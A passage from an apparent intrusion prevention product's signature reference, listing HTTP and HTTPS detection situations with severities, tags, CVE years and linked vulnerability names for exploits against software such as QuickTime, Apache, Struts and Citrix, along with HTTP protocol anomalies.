Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-633-5211
Last changed: sgpkg-ips-633-5211
Description:
Back to top

HTTPS_SS-Trend-Micro-Safesync-For-Enterprise-Ad.pm-Id-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in Trend Micro SafeSync for Enterprise detected
Context: HTTPS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro SafeSync for Enterprise, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-809-5242
Vulnerability: Trend-Micro-Safesync-For-Enterprise-Ad.pm-Id-Remote-Command-Execution
Description:
Back to top

HTTPS_SS-Very-Short-Diffie-Hellman-Prime

About this situation: A short prime in Diffie-Hellamn parameters detected
Context: HTTPS Server Stream
Severity: 10
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2015, Any Operating System not specific, Suspected Disclosure, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-648-5211
Last changed: sgpkg-ips-1137-5242
Vulnerability: Weak-Diffie-Hellman-Parameters
Description:
Back to top

HTTP_204-Response-With-Body

About this situation: HTTP server included a body in a 204 response
Context: HTTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-791-5211
Last changed: sgpkg-ips-791-5211
Description: The HTTP/1.1 specification defines that it is not allowed to include a message body in a response with status code 204 ("No Content"). Despite this prohibition, an HTTP server included a body in such a response.
Back to top

HTTP_304-Response-With-Body

About this situation: HTTP server included a body in a 304 response
Context: HTTP without parameters
Severity: 5
Tags: Protocol Information
First detected in: sgpkg-ips-791-5211
Last changed: sgpkg-ips-817-5242
Description: The HTTP/1.1 specification defines that it is not allowed to include a message body in a response with status code 304 ("Not Modified"). Despite this prohibition, an HTTP server included a body in such a response.
Back to top

HTTP_3ivx-MPEG-4-MP4-File-Handling-Stack-Overflow

About this situation: There exists a buffer overflow vulnerability in 3ivx MPEG-4.
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, 3ivx, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-356-4219
Last changed: sgpkg-ips-356-4219
Vulnerability: 3ivx-MPEG-4-MP4-File-Handling-Stack-Overflow
Description:
Back to top

HTTP_7-Zip-ARJ-Archive-Long-Local-File-Header-Buffer-Overflow

About this situation: Detects malformed ARJ archives that could cause a buffer overflow in 7-Zip
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, 7-Zip, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-40-1210
Last changed: sgpkg-ips-209-2032
Vulnerability: ARJ-Archive-Long-Local-File-Header-7-Zip-BOF
Description:
Back to top

HTTP_ACDSee-XPM-File-Handling-Buffer-Overflow

About this situation: Attempt to exploit stack buffer overflow vulnerability in ACDSee detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, ACDSee, ACDSee Photo Editor, ACDSee Pro, CVE2007, Windows not specific, ACDSee not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-108-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: ACDSee-XPM-File-Handling-Buffer-Overflow
Description:
Back to top

HTTP_Adobe-Acrobat-File-Information-Disclosure

About this situation: Exploit against file information disclosure vulnerability in Adobe Acrobat
Context: HTTP Server Stream
Severity: 2
Tags: Windows, x86, Adobe Reader, Adobe Acrobat, CVE2005, Windows not specific, Potential Disclosure, TCP Server Traffic
First detected in: sgpkg-ips-68-1314
Last changed: sgpkg-ips-325-4219
Vulnerability: Adobe-Acrobat-File-Information-Disclosure
Description:
Back to top

HTTP_Adobe-Acrobat-Reader-Plugin-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in the Adobe Acrobat Reader browser plugin detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2007, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-91-1314
Last changed: sgpkg-ips-249-3038
Vulnerability: HTTP-Adobe-Acrobat-Reader-Plugin-Cross-Site-Scripting
Description:
Back to top

HTTP_Adobe-Download-Manager-Buffer-Overflow

About this situation: Buffer overflow exploit against vulnerability in the Adobe Download Manager
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Download Manager, CVE2006, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-86-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Adobe-Download-Manager-Buffer-Overflow
Description:
Back to top

HTTP_Adobe-Flash-Player-FLV-Processing-Buffer-Overflow

About this situation: Detected attempt to exploit buffer overflow vulnerability in Adobe Flash Player
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2007, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Adobe-Flash-Player-FLV-Processing-Buffer-Overflow
Description:
Back to top

HTTP_Adobe-Products-PNG-File-Handling-Stack-Buffer-Overflow

About this situation: Attempt to exploit stack buffer overflow vulnerability in Adobe Photoshop detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Photoshop, Adobe Photoshop Elements, CVE2007, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-108-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Adobe-Products-PNG-File-Handling-Stack-Buffer-Overflow
Description:
Back to top

HTTP_Adobe-Shockwave-Director-tSAC-Chunk-Parsing-Memory-Corruption

About this situation: Adobe Shockware player has a vulnerability in tSAC chunk parsging which can result in arbitrary code execution
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Systems Shockwave Player, CVE2010, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-345-4219
Last changed: sgpkg-ips-345-4219
Vulnerability: Adobe-Shockwave-Director-tSAC-Chunk-Parsing-Memory-Corruption
Description:
Back to top

HTTP_ADODB.Stream-ActiveX-Object-Local-Disk-Write

About this situation: Local file write using ADODB.Stream ActiveX object detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Microsoft Data Access Components, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-94-1314
Last changed: sgpkg-ips-151-2032
Vulnerability: ADODB.Stream-ActiveX-Object-Local-Disk-Write
Description:
Back to top

HTTP_Akamai-Download-Manager-BOF

About this situation: An attempt to exploit a vulnerability in Akamai Download Manager detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Akamai Download Manager, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-140-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP_Akamai-Download-Manager-ActiveX-Buffer-Overflow
Description:
Back to top

HTTP_AMX-NetLinx-VNC-ActiveX-Control-Buffer-Overflow

About this situation: AMX NetLinx VNC ActiveX control detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, AMX NetLinx, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-114-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: AMX-NetLinx-VNC-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_Ani-Windows-Animationheader-Length-Buffer-Overflow

About this situation: Malicious ANI file detected, possible system compromise
Context: HTTP Server Stream
Severity: 10
Tags: Windows ME, Windows 2003, Windows 2000 SP0, Windows 2000 SP1, Windows 2000 SP2, Windows 2000 SP3, Windows 2000 SP4, Windows XP SP1, Windows XP SP0, Windows XP SP2, Windows Vista, Any Hardware, MS2005-01, MS2007-04, CVE2004, CVE2007, Windows 2003 not specific, Windows Vista not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-18-1210
Last changed: sgpkg-ips-167-2032
Vulnerability: Ani-Windows-Animationheader-Length-Buffer-Overflow
Ani-Windows-Animated-Cursor-Code-Execution
Description:
Back to top

HTTP_Ani-Windows-Zero-Frame-Or-Rate-Number-Ani-File-Denial-Of-Service

About this situation: Malicious ANI file detected, the file may freeze Windows OS
Context: HTTP Server Stream
Severity: 2
Tags: Windows NT, Windows 2003, Windows 2000 SP0, Windows 2000 SP1, Windows 2000 SP2, Windows 2000 SP3, Windows 2000 SP4, Windows XP SP1, Windows XP SP0, Any Hardware, CVE2004, Windows NT not specific, Windows 2003 not specific, Potential Denial of Service, TCP Server Traffic
First detected in: sgpkg-ips-18-1210
Last changed: sgpkg-ips-248-3038
Vulnerability: Ani-Windows-Zero-Frame-Or-Rate-Number-Ani-File-Denial-Of-Service
Description:
Back to top

HTTP_Apple-Computer-Finder-Dmg-Volume-Name-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Apple Mac OS X Finder detected
Context: HTTP Server Stream
Severity: 7
Tags: Mac OS X, Any Hardware, CVE2007, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-97-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Apple-Finder-Dmg-Volume-Name-Memory-Corruption
Description:
Back to top

HTTP_Apple-Ichat-Aim-Url-Handler-Format-String-Vulnerability

About this situation: An attempt to exploit a vulnerability in Apple iChat detected
Context: HTTP Server Stream
Severity: 7
Tags: Mac OS X, Any Hardware, Apple iChat AV, CVE2007, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-93-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Apple-Ichat-Aim-Url-Handler-Format-String-Vulnerability
Description:
Back to top

HTTP_Apple-iPhoto-Xml-Title-Format-String-Vulnerability

About this situation: An attempt to exploit a vulnerability in Apple iPhoto detected
Context: HTTP Server Stream
Severity: 7
Tags: Mac OS X, Any Hardware, Apple iPhoto, CVE2007, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-91-1314
Last changed: sgpkg-ips-405-4219
Vulnerability: HTTP-Apple-iPhoto-Xml-Title-Format-String-Vulnerability
Description:
Back to top

HTTP_Apple-QuickDraw-GetSrcBits32ARGB-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Apple Mac OS X detected.
Context: HTTP Server Stream
Severity: 7
Tags: Mac OS X, Any Hardware, CVE2007, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-93-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Apple-QuickDraw-GetSrcBits32ARGB-Memory-Corruption
Description:
Back to top

HTTP_Apple-QuickTime-BMP-Handling-Buffer-Overflow

About this situation: Exploit against buffer overflow vulnerability in Apple QuickTime's BMP image handling
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2006, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-66-1210
Last changed: sgpkg-ips-248-3038
Vulnerability: Apple-QuickTime-BMP-Handling-Buffer-Overflow
Description:
Back to top

HTTP_Apple-QuickTime-Color-Table-Id-Heap-Corruption

About this situation: Attempt to exploit heap corruption vulnerability in Apple QuickTime detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2007, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-99-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Apple-QuickTime-Color-Table-Id-Heap-Corruption
Description:
Back to top

HTTP_Apple-QuickTime-Flic-Animation-File-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple QuickTime detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2006, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-91-1314
Last changed: sgpkg-ips-354-4219
Vulnerability: Apple-QuickTime-Flic-Animation-File-Buffer-Overflow
Description:
Back to top

HTTP_Apple-QuickTime-FlipFileTypeAtomBton-Integer-Underflow

About this situation: Attempt to exploit integer underflow vulnerability in Apple QuickTime detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2007, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Apple-QuickTime-FlipFileTypeAtomBton-Integer-Underflow
Description:
Back to top

HTTP_Apple-QuickTime-FPX-File-Handling-Integer-Overflow

About this situation: Detects integer overflow exploits against Apple QuickTime
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2006, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-66-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Apple-QuickTime-FPX-File-Handling-Integer-Overflow
Description:
Back to top

HTTP_Apple-QuickTime-H.264-Crafted-Movie-Buffer-Overflow

About this situation: Detects buffer overflow exploits against Apple QuickTime's H.264 processing component
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2006, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-82-1314
Last changed: sgpkg-ips-248-3038
Vulnerability: HTTP-Apple-QuickTime-H.264-Crafted-Movie-Buffer-Overflow
Description:
Back to top

HTTP_Apple-QuickTime-Mov-File-Hreftrack-Cross-Zone-Scripting

About this situation: An attempt to exploit a vulnerability in Apple QuickTime detected.
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2007, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-94-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Apple-QuickTime-Mov-File-Hreftrack-Cross-Zone-Scripting
Description:
Back to top

HTTP_Apple-QuickTime-Mov-File-JVTCompEncodeFrame-Heap-Overflow

About this situation: An attempt to exploit heap overflow vulnerability in Apple QuickTime detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2007, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Apple-QuickTime-Mov-File-JVTCompEncodeFrame-Heap-Overflow
Description:
Back to top

HTTP_Apple-QuickTime-Movie-With-Embedded-Script

About this situation: An Apple QuickTime movie file with an embedded script detected
Context: HTTP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Apple QuickTime, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-94-1314
Last changed: sgpkg-ips-188-2032
Vulnerability: Apple-QuickTime-Movie-With-Embedded-Script
Description:
Back to top

HTTP_Apple-QuickTime-Plug-In-Security-Bypass

About this situation: Detects security bypass exploits against Apple QuickTime browser plug-in
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2006, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-81-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Apple-QuickTime-Plug-In-Security-Bypass
Description:
Back to top

HTTP_Apple-QuickTime-Udta-Atom-Parsing-Heap-Overflow-Vulnerability

About this situation: Attempt to exploit a heap overflow vulnerability in Apple QuickTime detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2007, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-100-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Apple-QuickTime-Udta-Atom-Parsing-Heap-Overflow-Vulnerability
Description:
Back to top

HTTP_Apple-Safari-Regular-Expression-Heap-Buffer-Overflow

About this situation: Buffer overflow exploit against Apple Safari web browser detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, CVE2007, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-118-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Apple-Safari-Regular-Expression-Heap-Buffer-Overflow
Description:
Back to top

HTTP_Asp-Scripting-In-Server-Reply

About this situation: Detected ASP scripting in the server reply
Context: HTTP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-125-2032
Last changed: sgpkg-ips-188-2032
Vulnerability: Web-Server-Side-Script-Disclosure
Description:
Back to top

HTTP_AVI-DirectX-DirectShow-AVI-Strn-BOF

About this situation: Detects malformed AVI files that could cause a buffer overflow in Microsoft DirectX DirectShow
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, DirectX, MS2005-10, CVE2005, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-44-1210
Last changed: sgpkg-ips-248-3038
Vulnerability: AVI-DirectX-DirectShow-AVI-Strn-BOF
Description:
Back to top

HTTP_Axis-Camera-Control-ActiveX-Control-SetBMP-Buffer-Overflow

About this situation: Use of vulnerable method of AXIS Camera Control ActiveX control detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, AXIS Camera Control, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Axis-Camera-Control-ActiveX-Control-SetBMP-Buffer-Overflow
Description:
Back to top

HTTP_Bad-Content-Length

About this situation: Multiple Content-Length headers
Context: SSM Context
Severity: 5
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Multiple Content-Length headers detected. Session terminated.
Back to top

HTTP_BD-Wow32-Banner

About this situation: Wow32 backdoor detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Wow23, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-Wow23-03
Description:
Back to top

HTTP_Body-No-Length

About this situation: Illegal length
Context: SSM Context
Severity: 5
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: A request with a body must contain either a valid Content-Length header or a valid Transfer-Encoding header.
Back to top

HTTP_Body-Not-Allowed-Request

About this situation: Request body not allowed
Context: SSM Context
Severity: 5
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Body is not allowed for request type.
Back to top

HTTP_Body-Not-Allowed-Response

About this situation: Response body not allowed
Context: SSM Context
Severity: 5
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Body is not allowed for response type and method.
Back to top

HTTP_Business-Objects-Crystal-Reports-Rpt-File-Handling

About this situation: An attempt to exploit a vulnerability in Business Objects Crystal Reports detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Crystal Reports, Business Objects Crystal Enterprise, Microsoft Visual Studio .NET 2002, Microsoft Visual Studio .NET 2003, Microsoft Visual Studio 2005, MS2007-09, CVE2006, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-124-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Business-Objects-Crystal-Reports-Rpt-File-Handling
Description:
Back to top

HTTP_CCH-Apache-And-Nginx-Multiple-Chunked-Encoding-Vulnerabilities

About this situation: Detects buffer overflow exploits against Apache and nginx HTTP servers
Context: HTTP Chunk Header
Severity: 10
Tags: Any Operating System, Any Hardware, Apache2, Apache, nginx, CVE2002, CVE2013, Any Operating System not specific, Apache not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-401-4219
Vulnerability: HTTP-Apache-Chunked-Encoding-BOF
Nginx-Chunked-Encoding-Buffer-Overflow
Nginx-Chunked-Transfer-Parsing-Denial-Of-Service
Description:
Back to top

HTTP_CCH-Apache-Chunked-Encoding-BO-3

About this situation: Apache Chunked Encoding Buffer Overflow
Context: HTTP Chunk Header
Severity: 10
Tags: Any Operating System, x86, Apache, CVE2002, Any Operating System not specific, Apache not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-508-5211
Vulnerability: HTTP-Apache-Chunked-Encoding-BOF
Description:
Back to top

HTTP_CCH-Apache-Chunked-Encoding-BO-5

About this situation: Apache Chunked Encoding Buffer Overflow
Context: HTTP Chunk Header
Severity: 10
Tags: Any Operating System, Any Hardware, Apache, CVE2002, Any Operating System not specific, Apache not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-88-1314
Last changed: sgpkg-ips-508-5211
Vulnerability: HTTP-Apache-Chunked-Encoding-BOF
Description:
Back to top

HTTP_CCH-Apache-Tomcat-Chunked-Transfer-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Tomcat detected
Context: HTTP Chunk Header
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Tomcat, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-560-5211
Vulnerability: Apache-Tomcat-Chunked-Transfer-Denial-Of-Service
Description:
Back to top

HTTP_CCH-Chunk-Extension

About this situation: Detected chunk header extension
Context: HTTP Chunk Header
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-729-5211
Last changed: sgpkg-ips-729-5211
Description:
Back to top

HTTP_CCH-Large-Chunk-Size

About this situation: Detected over 4 GB sized chunk header
Context: HTTP Chunk Header
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-592-5211
Last changed: sgpkg-ips-592-5211
Description:
Back to top

HTTP_CCH-Maliciously-Large-Chunk-Size

About this situation: A HTTP request with a very large chunk header detected
Context: HTTP Chunk Header
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Tomcat, CVE2014, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-592-5211
Last changed: sgpkg-ips-1821-5242
Vulnerability: Apache-Tomcat-Chunkedinputfilter-Malformed-Chunk-Size-Denial-Of-Service
Fortinet-FortiOS-Out-Of-Bound-Write-CVE-2024-21762
Description:
Back to top

HTTP_CCH-RSA-Authentication-Agent-For-Web-Chunked-Encoding-BOF

About this situation: Detects buffer overflow exploits against RSA Authentication Agent for Web
Context: HTTP Chunk Header
Severity: 7
Tags: Any Operating System, x86, RSA Security RSA Authentication for Web for IIS, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-493-5211
Last changed: sgpkg-ips-509-5211
Vulnerability: HTTP-RSA-Authentication-Agent-For-Web-Chunked-Encoding-BOF
Description:
Back to top

HTTP_CCH-Zero-Chunk-Size

About this situation: Detected zero sized chunck header
Context: HTTP Chunk Header
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-525-5211
Last changed: sgpkg-ips-568-5211
Description:
Back to top

HTTP_CHS-Apache-Struts-Cookieinterceptor-Classloader-Security-Bypass

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Struts detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Struts, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-1644-5242
Vulnerability: Apache-Struts-Cookieinterceptor-Classloader-Security-Bypass
Description:
Back to top

HTTP_CHS-Citrix-Authorization-Bypass-CVE-2020-8193

About this situation: An attempt to exploit a vulnerability in Citrix detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Citrix Gateway, Citrix Application Delivery Controller, Citrix SDWAN WANOP, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1262-5242
Last changed: sgpkg-ips-1475-5242
Vulnerability: Citrix-Authorization-Bypass-CVE-2020-8193
Description:
Back to top

HTTP_CHS-Emotet-Host-In-HTTP

About this situation: Request to Emotet Malware host detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-894-5242
Last changed: sgpkg-ips-1528-5242
Vulnerability: Emotet-Banking-Malware
Description:
Back to top

HTTP_CHS-Intel-AMT-CVE-2017-5689

About this situation: An attempt to exploit CVE-2017-5689 detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Intel AMT, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-899-5242
Last changed: sgpkg-ips-900-5242
Vulnerability: Intel-AMT-CVE-2017-5689
Description:
Back to top

HTTP_CHS-Suspicious-Host

About this situation: Request to suspicious http host detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-654-5211
Last changed: sgpkg-ips-1713-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

HTTP_Chunk-Size

About this situation: Invalid chunk size
Context: SSM Context
Severity: 5
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Invalid chunk size found.
Back to top

HTTP_Citrix-Presentation-Server-Client-ActiveX-Control-Buffer-Overflow

